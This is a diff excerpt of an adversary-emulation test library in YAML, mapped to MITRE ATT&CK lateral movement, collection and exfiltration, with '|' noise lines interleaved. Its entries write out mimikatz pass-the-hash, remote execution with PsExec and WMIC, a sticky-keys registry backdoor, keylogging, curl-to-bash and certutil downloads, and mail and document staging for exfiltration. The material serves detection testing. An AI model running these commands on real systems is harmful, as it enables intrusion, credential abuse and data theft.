command: 'mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: crackmapexec Pass the Hash
|
|
|
|
|
description: 'command execute with crackmapexec
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26096,7 +26171,7 @@ lateral-movement:
|
|
|
|
|
- name: Mimikatz Kerberos Ticket Attack
|
|
|
|
|
description: 'Similar to PTH, but attacking Kerberos
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26112,7 +26187,7 @@ lateral-movement:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'mimikatz # kerberos::ptt #{user_name}@#{domain}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1076:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -26185,7 +26260,7 @@ lateral-movement:
|
|
|
|
|
- how to hijack RDS and RemoteApp sessions transparently to move through an
|
|
|
|
|
organization
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -26197,12 +26272,12 @@ lateral-movement:
|
|
|
|
|
net start sesshijack
|
|
|
|
|
cleanup_command: 'sc.exe delete sesshijack
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: RDPto-DomainController
|
|
|
|
|
description: 'Attempt an RDP session via "Connect-RDP" to a system. Default
|
|
|
|
|
RDPs to (%logonserver%) as the current user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26225,7 +26300,7 @@ lateral-movement:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Connect-RDP -ComputerName #{logonserver} -User #{username}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1105:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -26277,7 +26352,7 @@ lateral-movement:
|
|
|
|
|
- name: rsync remote file copy (push)
|
|
|
|
|
description: 'Utilize rsync to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26302,11 +26377,11 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: rsync remote file copy (pull)
|
|
|
|
|
description: 'Utilize rsync to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26331,11 +26406,11 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: scp remote file copy (push)
|
|
|
|
|
description: 'Utilize scp to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26360,11 +26435,11 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: scp remote file copy (pull)
|
|
|
|
|
description: 'Utilize scp to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26389,11 +26464,11 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: sftp remote file copy (push)
|
|
|
|
|
description: 'Utilize sftp to perform a remote file copy (push)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26418,11 +26493,11 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'sftp #{username}@#{remote_host}:#{remote_path} <<< $''put #{local_file}''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: sftp remote file copy (pull)
|
|
|
|
|
description: 'Utilize sftp to perform a remote file copy (pull)
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -26447,12 +26522,12 @@ lateral-movement:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: certutil download (urlcache)
|
|
|
|
|
description: 'Use certutil -urlcache argument to download a file from the web.
|
|
|
|
|
Note - /urlcache also works!
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26469,12 +26544,12 @@ lateral-movement:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'cmd /c certutil -urlcache -split -f #{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: certutil download (verifyctl)
|
|
|
|
|
description: 'Use certutil -verifyctl argument to download a file from the web.
|
|
|
|
|
Note - /verifyctl also works!
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26519,7 +26594,7 @@ lateral-movement:
|
|
|
|
|
command: 'C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority
|
|
|
|
|
HIGH #{remote_file} #{local_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - PowerShell Download
|
|
|
|
|
description: |
|
|
|
|
|
This test uses PowerShell to download a payload.
|
|
|
|
@@ -26540,15 +26615,15 @@ lateral-movement:
|
|
|
|
|
command: '(New-Object System.Net.WebClient).DownloadFile("#{remote_file}",
|
|
|
|
|
"#{destination_path}")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item #{destination_path} -Force -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: OSTAP Worming Activity
|
|
|
|
|
description: 'OSTap copies itself in a specfic way to shares and secondary drives.
|
|
|
|
|
This emulates the activity.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26664,7 +26739,7 @@ lateral-movement:
|
|
|
|
|
- name: Map admin share
|
|
|
|
|
description: 'Connecting To Remote Shares
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26690,11 +26765,11 @@ lateral-movement:
|
|
|
|
|
command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password}
|
|
|
|
|
/u:#{user_name}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Map Admin Share PowerShell
|
|
|
|
|
description: 'Map Admin share utilizing PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26715,12 +26790,12 @@ lateral-movement:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Copy and Execute File with PsExec
|
|
|
|
|
description: 'Copies a file to a remote host and executes it using PsExec. Requires
|
|
|
|
|
the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26737,7 +26812,7 @@ lateral-movement:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'psexec.exe #{remote_host} -c #{command_path}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Execute command writing output to local Admin Share
|
|
|
|
|
description: |
|
|
|
|
|
Executes a command, writing the output to a local Admin Share.
|
|
|
|
@@ -26759,7 +26834,7 @@ lateral-movement:
|
|
|
|
|
command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file}
|
|
|
|
|
2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1028:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -26822,8 +26897,10 @@ lateral-movement:
|
|
|
|
|
identifier: T1028
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Enable Windows Remote Management
|
|
|
|
|
description: "Powershell Enable WinRM\n\nUpon successful execution, powershell
|
|
|
|
|
will \"Enable-PSRemoting\" allowing for remote PS access. \n"
|
|
|
|
|
description: |
|
|
|
|
|
Powershell Enable WinRM
|
|
|
|
|
|
|
|
|
|
Upon successful execution, powershell will "Enable-PSRemoting" allowing for remote PS access.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -26831,10 +26908,16 @@ lateral-movement:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'Enable-PSRemoting -Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell Lateral Movement
|
|
|
|
|
description: "Powershell lateral movement using the mmc20 application com object.\n\nReference:\n\nhttps://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/\n\nUpon
|
|
|
|
|
successful execution, cmd will spawn calc.exe on a remote computer. \n"
|
|
|
|
|
description: |
|
|
|
|
|
Powershell lateral movement using the mmc20 application com object.
|
|
|
|
|
|
|
|
|
|
Reference:
|
|
|
|
|
|
|
|
|
|
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
|
|
|
|
|
|
|
|
|
|
Upon successful execution, cmd will spawn calc.exe on a remote computer.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -26843,11 +26926,11 @@ lateral-movement:
|
|
|
|
|
type: string
|
|
|
|
|
default: computer1
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
|
|
|
|
name: powershell
|
|
|
|
|
command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe",
|
|
|
|
|
$null, $null, "7")
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: WMIC Process Call Create
|
|
|
|
|
description: |
|
|
|
|
|
Utilize WMIC to start remote process.
|
|
|
|
@@ -26875,7 +26958,7 @@ lateral-movement:
|
|
|
|
|
NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\"
|
|
|
|
|
/t REG_SZ /d \"cmd.exe\" /f"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Psexec
|
|
|
|
|
description: |
|
|
|
|
|
Utilize psexec to start remote process.
|
|
|
|
@@ -26933,7 +27016,7 @@ lateral-movement:
|
|
|
|
|
name: powershell
|
|
|
|
|
command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
collection:
|
|
|
|
|
T1123:
|
|
|
|
|
technique:
|
|
|
|
@@ -26985,7 +27068,7 @@ collection:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1119:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -27040,33 +27123,40 @@ collection:
|
|
|
|
|
identifier: T1119
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Automated Collection Command Prompt
|
|
|
|
|
description: 'Automated Collection
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
|
|
|
|
|
to see what was collected.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: |
|
|
|
|
|
mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
|
|
|
|
|
dir c: /b /s .docx | findstr /e .docx
|
|
|
|
|
for /R c: %f in (*.docx) do copy %f c:\temp\
|
|
|
|
|
- name: Automated Collection PowerShell
|
|
|
|
|
description: 'Automated Collection
|
|
|
|
|
for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
|
|
|
|
|
cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Automated Collection PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
|
|
|
|
|
to see what was collected.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName
|
|
|
|
|
-destination c:\temp}
|
|
|
|
|
command: |
|
|
|
|
|
New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
|
|
|
|
|
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
|
|
|
|
|
cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force
|
|
|
|
|
| Out-Null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Recon information for export with PowerShell
|
|
|
|
|
description: 'collect information for exfiltration
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
|
|
|
|
|
to see what was collected.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -27081,9 +27171,9 @@ collection:
|
|
|
|
|
Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
|
|
|
|
|
Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
|
|
|
|
|
- name: Recon information for export with Command Prompt
|
|
|
|
|
description: 'collect information for exfiltration
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
|
|
|
|
|
to see what was collected.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -27094,7 +27184,7 @@ collection:
|
|
|
|
|
doskey /history > %TEMP%\T1119_2.txt
|
|
|
|
|
wmic process list > %TEMP%\T1119_3.txt
|
|
|
|
|
tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
|
|
|
|
|
cleanup_command: |-
|
|
|
|
|
cleanup_command: |
|
|
|
|
|
del %TEMP%\T1119_1.txt >nul 2>&1
|
|
|
|
|
del %TEMP%\T1119_2.txt >nul 2>&1
|
|
|
|
|
del %TEMP%\T1119_3.txt >nul 2>&1
|
|
|
|
@@ -27147,7 +27237,7 @@ collection:
|
|
|
|
|
- name: Utilize Clipboard to store or execute commands from
|
|
|
|
|
description: 'Add data to clipboard to copy off or execute commands from.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -27159,12 +27249,12 @@ collection:
|
|
|
|
|
clip < %temp%\T1115.txt
|
|
|
|
|
cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: PowerShell
|
|
|
|
|
description: 'Utilize PowerShell to echo a command to clipboard and execute
|
|
|
|
|
it
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -27216,24 +27306,31 @@ collection:
|
|
|
|
|
identifier: T1074
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: Stage data from Discovery.bat
|
|
|
|
|
description: 'Utilize powershell to download discovery.bat and save to a local
|
|
|
|
|
file
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Utilize powershell to download discovery.bat and save to a local file. This emulates an attacker downloading data collection tools onto the host. Upon execution,
|
|
|
|
|
verify that the file is saved in the temp directory.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
output_file:
|
|
|
|
|
description: Location to save downloaded discovery.bat file
|
|
|
|
|
type: Path
|
|
|
|
|
default: "$env:TEMP\\discovery.bat"
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat'')
|
|
|
|
|
> pi.log
|
|
|
|
|
command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.bat"
|
|
|
|
|
-OutFile #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Stage data from Discovery.sh
|
|
|
|
|
description: 'Utilize curl to download discovery.sh and execute a basic information
|
|
|
|
|
gathering shell script
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -27242,25 +27339,32 @@ collection:
|
|
|
|
|
command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/src/Discovery.sh
|
|
|
|
|
| bash -s > /tmp/discovery.log
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Zip a Folder with PowerShell for Staging in Temp
|
|
|
|
|
description: 'Use living off the land tools to zip a file and stage it in the
|
|
|
|
|
Windows temporary folder for later exfiltration.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
|
|
|
|
|
was placed in the temp directory.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
input_file:
|
|
|
|
|
description: Location of file or folder to zip
|
|
|
|
|
type: Path
|
|
|
|
|
default: PathToAtomicsFolder\T1074\bin\Folder_to_zip
|
|
|
|
|
output_file:
|
|
|
|
|
description: Location to save zipped file or folder
|
|
|
|
|
type: Path
|
|
|
|
|
default: "$env:TEMP\\Folder_to_zip.zip"
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip
|
|
|
|
|
-DestinationPath $env:TEMP\Folder_to_zip.zip
|
|
|
|
|
command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file}
|
|
|
|
|
-Force
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction
|
|
|
|
|
Ignore
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -27457,7 +27561,7 @@ collection:
|
|
|
|
|
description: 'Search through local Outlook installation, extract mail, compress
|
|
|
|
|
the contents, and saves everything to a directory for later exfiltration.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -27471,10 +27575,10 @@ collection:
|
|
|
|
|
command: 'powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox.ps1
|
|
|
|
|
-file #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1056:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -27558,7 +27662,7 @@ collection:
|
|
|
|
|
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
|
|
|
|
|
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1113:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -27614,7 +27718,7 @@ collection:
|
|
|
|
|
- name: Screencapture
|
|
|
|
|
description: 'Use screencapture command to collect a full desktop screenshot
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -27627,11 +27731,11 @@ collection:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'screencapture #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Screencapture (silent)
|
|
|
|
|
description: 'Use screencapture command to collect a full desktop screenshot
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -27644,12 +27748,12 @@ collection:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'screencapture -x #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: X Windows Capture
|
|
|
|
|
description: 'Use xwd command to collect a full desktop screenshot and review
|
|
|
|
|
file with xwud
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -27665,7 +27769,7 @@ collection:
|
|
|
|
|
- name: Import
|
|
|
|
|
description: 'Use import command to collect a full desktop screenshot
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -27677,7 +27781,7 @@ collection:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'import -window root #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
exfiltration:
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
@@ -27796,10 +27900,10 @@ exfiltration:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Compress Data for Exfiltration With Rar
|
|
|
|
|
description: "An adversary may compress data (e.g., sensitive documents) that
|
|
|
|
|
is collected prior to exfiltration.\nWhen the test completes you should find
|
|
|
|
@@ -27841,15 +27945,15 @@ exfiltration:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Data Compressed - nix - zip
|
|
|
|
|
description: 'An adversary may compress data (e.g., sensitive documents) that
|
|
|
|
|
is collected prior to exfiltration. This test uses standard zip compression.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -27873,18 +27977,18 @@ exfiltration:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
prereq_command: 'ls #{input_files} > /dev/null
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
command: 'zip #{output_file} #{input_files}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'rm -f #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Data Compressed - nix - gzip Single File
|
|
|
|
|
description: 'An adversary may compress data (e.g., sensitive documents) that
|
|
|
|
|
is collected prior to exfiltration. This test uses standard gzip compression.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -27904,15 +28008,15 @@ exfiltration:
|
|
|
|
|
command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
|
|
|
|
|
>> #{input_file}; gzip -k #{input_file})
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'rm -f #{input_file}.gz
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Data Compressed - nix - tar Folder or File
|
|
|
|
|
description: 'An adversary may compress data (e.g., sensitive documents) that
|
|
|
|
|
is collected prior to exfiltration. This test uses standard gzip compression.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -27935,10 +28039,10 @@ exfiltration:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'tar -cvzf #{output_file} #{input_file_folder}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'rm -f #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1022:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -27997,7 +28101,7 @@ exfiltration:
|
|
|
|
|
- name: Data Encrypted with zip and gpg symmetric
|
|
|
|
|
description: 'Encrypt data for exiltration
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -28017,7 +28121,7 @@ exfiltration:
|
|
|
|
|
ls -l
|
|
|
|
|
cleanup_command: 'rm -Rf /tmp/victim-files
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Compress Data and lock with password for Exfiltration with winrar
|
|
|
|
|
description: |
|
|
|
|
|
Note: Requires winrar installation
|
|
|
|
@@ -28074,7 +28178,7 @@ exfiltration:
|
|
|
|
|
